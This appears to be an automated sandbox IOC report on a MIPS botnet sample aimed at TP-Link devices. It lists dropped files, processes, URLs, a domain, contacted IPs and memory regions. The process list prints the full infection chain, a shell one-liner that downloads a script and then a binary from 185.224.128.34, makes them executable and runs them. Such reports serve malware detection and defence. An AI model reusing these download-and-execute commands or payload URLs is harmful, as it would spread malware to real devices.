IOC Report

loading gif

Files

File Path
Type
Category
Malicious
/tmp/system
ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
dropped
 malicious
/tmp/shk
ASCII text
dropped

Processes

Path
Cmdline
Malicious
/bin/sh
/bin/sh -c "cd /tmp; rm -rf shk; wget http://185.224.128.34/shk; chmod 777 shk; ./shk tplink; rm -rf shk"
/bin/sh
-
/usr/bin/rm
rm -rf shk
/bin/sh
-
/usr/bin/wget
wget http://185.224.128.34/shk
/bin/sh
-
/usr/bin/chmod
chmod 777 shk
/bin/sh
-
/bin/sh
/bin/sh ./shk tplink
/bin/sh
-
/usr/bin/rm
rm -rf system
/bin/sh
-
/usr/bin/rm
rm -rf mips
/bin/sh
-
/usr/bin/wget
wget http://185.224.128.34/mips -O system
/bin/sh
-
/usr/bin/chmod
chmod 777 system
/bin/sh
-
/tmp/system
./system tplink
/tmp/system
-
/tmp/system
-
/tmp/system
-
/bin/sh
-
/usr/bin/rm
rm -rf system
/bin/sh
-
/usr/bin/rm
rm -rf shk
/usr/bin/dash
-
/usr/bin/rm
rm -f /tmp/tmp.aWATdU1QF5 /tmp/tmp.PRIH5wqT7Y /tmp/tmp.Cs4hpwviby
/usr/bin/dash
-
/usr/bin/rm
rm -f /tmp/tmp.aWATdU1QF5 /tmp/tmp.PRIH5wqT7Y /tmp/tmp.Cs4hpwviby
There are 20 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://185.224.128.34/mips
185.224.128.34
http://185.224.128.34/shk
185.224.128.34

Domains

Name
IP
Malicious
rooty.cc
185.224.128.34

IPs

IP
Domain
Country
Malicious
25.186.29.17
unknown
United Kingdom
107.212.160.104
unknown
United States
117.91.172.124
unknown
China
142.155.153.213
unknown
Canada
214.19.20.100
unknown
United States
118.3.19.175
unknown
Japan
98.168.167.168
unknown
United States
20.149.69.44
unknown
United States
253.128.244.98
unknown
Reserved
112.137.186.237
unknown
Japan
64.19.147.27
unknown
United States
140.45.6.27
unknown
United States
196.174.184.99
unknown
Ghana
159.232.171.75
unknown
Switzerland
178.19.54.207
unknown
Iceland
170.150.164.106
unknown
Brazil
205.59.146.130
unknown
United States
138.105.211.235
unknown
United States
27.123.186.212
unknown
Fiji
149.127.94.136
unknown
United States
16.0.75.111
unknown
United States
162.66.218.70
unknown
United States
245.180.32.248
unknown
Reserved
254.101.85.223
unknown
Reserved
246.184.16.162
unknown
Reserved
102.221.5.1
unknown
unknown
145.146.246.103
unknown
Netherlands
52.186.157.23
unknown
United States
151.54.223.95
unknown
Italy
86.251.101.150
unknown
France
138.231.213.68
unknown
France
35.118.4.255
unknown
United States
133.165.237.162
unknown
Japan
19.196.210.101
unknown
United States
136.164.80.135
unknown
Norway
247.250.115.207
unknown
Reserved
115.117.247.27
unknown
India
130.74.148.203
unknown
United States
12.32.11.133
unknown
United States
92.176.250.51
unknown
France
136.166.243.129
unknown
United States
206.177.112.156
unknown
Canada
151.250.138.254
unknown
Turkey
39.235.255.226
unknown
Indonesia
129.134.47.150
unknown
United States
174.128.255.203
unknown
United States
161.224.204.232
unknown
United States
191.134.200.230
unknown
Brazil
77.150.114.125
unknown
France
109.39.218.145
unknown
Netherlands
178.166.232.106
unknown
Russian Federation
242.4.139.255
unknown
Reserved
146.166.141.218
unknown
United States
87.88.109.146
unknown
France
41.171.76.135
unknown
South Africa
211.38.62.100
unknown
Korea Republic of
28.237.108.227
unknown
United States
98.238.55.232
unknown
United States
21.46.80.3
unknown
United States
131.69.86.207
unknown
United States
75.23.105.155
unknown
United States
146.156.8.212
unknown
United States
123.252.186.59
unknown
India
109.172.227.147
unknown
Georgia
149.154.18.100
unknown
United States
65.9.99.136
unknown
United States
218.139.43.107
unknown
Japan
251.101.67.12
unknown
Reserved
70.42.217.2
unknown
United States
145.4.180.30
unknown
Netherlands
89.254.150.24
unknown
Latvia
205.126.159.56
unknown
United States
164.245.75.94
unknown
United States
57.10.226.162
unknown
Belgium
118.251.90.41
unknown
China
117.126.202.87
unknown
China
112.242.151.31
unknown
China
135.152.8.218
unknown
United States
41.74.231.222
unknown
unknown
148.142.94.12
unknown
United States
174.72.38.255
unknown
United States
63.188.242.150
unknown
United States
101.152.10.92
unknown
China
200.191.187.94
unknown
Brazil
148.22.240.59
unknown
United States
154.72.132.115
unknown
Cameroon
69.240.239.149
unknown
United States
37.172.212.192
unknown
France
246.57.245.181
unknown
Reserved
54.171.230.55
unknown
United States
46.251.115.179
unknown
Cyprus
214.218.60.119
unknown
United States
69.154.33.206
unknown
United States
12.61.57.1
unknown
United States
207.52.85.53
unknown
United States
21.150.40.24
unknown
United States
106.147.219.116
unknown
Japan
150.96.78.16
unknown
Japan
186.245.163.63
unknown
Brazil
77.82.180.107
unknown
Russian Federation
There are 90 hidden IPs, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
7efdd0411000
page execute read
 malicious
7efdd0411000
page execute read
 malicious
7efdd0411000
page execute read
 malicious
7efdd0411000
page execute read
 malicious
7efe50000000
page read and write
55cbc51b4000
page execute and read and write
7efe570da000
page read and write
7efdd0453000
page read and write
7ffd90d7c000
page execute read
7efe56bc8000
page read and write
55cbc6db7000
page read and write
7efe570da000
page read and write
55cbc31ac000
page read and write
7efe57203000
page read and write
7efe5720b000
page read and write
7efdd0453000
page read and write
7efe56537000
page read and write
7efdd0452000
page read and write
7ffd90d7c000
page execute read
7efe56b88000
page read and write
7efe567e7000
page read and write
7ffd90d76000
page read and write
7efe56529000
page read and write
55cbc51b4000
page execute and read and write
7efe570da000
page read and write
55cbc6db7000
page read and write
55cbc31ac000
page read and write
7efe570da000
page read and write
7ffd90d7c000
page execute read
55cbc6db7000
page read and write
55cbc2f24000
page execute read
7efe50000000
page read and write
7efe56bab000
page read and write
55cbc51cb000
page read and write
7efe56537000
page read and write
55cbc31b6000
page read and write
7efe5720b000
page read and write
7efe55d21000
page read and write
7efe57250000
page read and write
7efe56ef9000
page read and write
7ffd90d76000
page read and write
55cbc51cb000
page read and write
55cbc31ac000
page read and write
7ffd90d76000
page read and write
7ffd90d76000
page read and write
7efe56537000
page read and write
55cbc51b4000
page execute and read and write
55cbc51b4000
page execute and read and write
7efdd0452000
page read and write
7efe56ef9000
page read and write
7efe50000000
page read and write
55cbc31b6000
page read and write
7efe55d21000
page read and write
7efdd0452000
page read and write
7efe56537000
page read and write
7efe56529000
page read and write
55cbc2f24000
page execute read
55cbc31b6000
page read and write
7efe50021000
page read and write
7efe56b88000
page read and write
7efe56bc8000
page read and write
7efe56b88000
page read and write
7efe56529000
page read and write
55cbc2f24000
page execute read
7efe50021000
page read and write
55cbc2f24000
page execute read
7efe56ef9000
page read and write
7efe55d21000
page read and write
55cbc31b6000
page read and write
7efe5720b000
page read and write
7efe57250000
page read and write
7efe56bab000
page read and write
55cbc6db7000
page read and write
7efe50000000
page read and write
7efdd04cb000
page read and write
7efdd0453000
page read and write
7efe56bc8000
page read and write
7efe50021000
page read and write
55cbc51cb000
page read and write
7efe56bab000
page read and write
7efe56529000
page read and write
55cbc51cb000
page read and write
7efe567e7000
page read and write
7efe56bc8000
page read and write
7efe56bab000
page read and write
7ffd90d7c000
page execute read
7efe55d21000
page read and write
7efdd0452000
page read and write
7efe567e7000
page read and write
7efe5720b000
page read and write
7efe50021000
page read and write
7efe56b88000
page read and write
55cbc31ac000
page read and write
7efe57203000
page read and write
7efdd0453000
page read and write
7efe56ef9000
page read and write
7efe57203000
page read and write
7efe57250000
page read and write
7efe57250000
page read and write
7efe567e7000
page read and write
7efe57203000
page read and write
There are 91 hidden memdumps, click here to show them.